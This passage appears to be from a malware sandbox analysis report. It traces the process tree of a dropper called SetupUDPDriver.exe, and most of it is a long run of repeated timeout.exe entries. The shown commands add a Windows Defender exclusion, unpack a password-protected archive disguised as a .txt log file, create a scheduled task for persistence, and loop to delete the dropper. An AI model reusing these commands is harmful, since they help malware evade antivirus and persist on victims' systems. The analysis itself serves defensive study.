    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe
    "C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
      C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      4⤵
      PID:824
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
        5⤵
        Creates scheduled task(s)
        
        PID:1132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\SETUPU~1.EXE"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\SETUPU~1.EXE" exit)
      4⤵
      PID:1256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1788
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1428
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2028
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1940
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2768
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1600
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2100
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2728
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1724
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1216
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2324
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2044
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1624
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1584
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2168
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1216
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2940
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1428
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1792
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2816
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2444
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1836
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1284
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2300
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:668
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2532
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2316
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2620
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1944
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2672
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:536
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:684
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1072
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2796
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1304
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:664
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2208
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2680
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1028
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:856
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2488
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1304
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1868
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1028
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1600
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:856
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2064
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1344
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1196
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2216
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1600
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2208
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2376
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2316
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2176
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1284
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:664
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2176
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3080
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3096
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3116
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3148
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3244
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3300
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3316
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3336
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3384
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3404
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3428
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3476
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3532
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3548
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3560
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3592
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3608
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3624
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3648
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3664
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3692
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3704
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3732
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3792
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3836
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3852
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3864
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3892
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3708
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4068
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3592
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3932
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3596
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3796
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3940
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3180
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3252
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3428
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:908
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3564
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3608
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3648
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3724
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3768
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:920
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3316
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3704
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3592
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3708
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3956
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3120
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3116
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3148
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4056
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4072
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3388
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3436
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3552
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3724
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3956
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3084
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4060
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2476
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3440
    - - C:\Windows\SysWOW64\timeout.exe
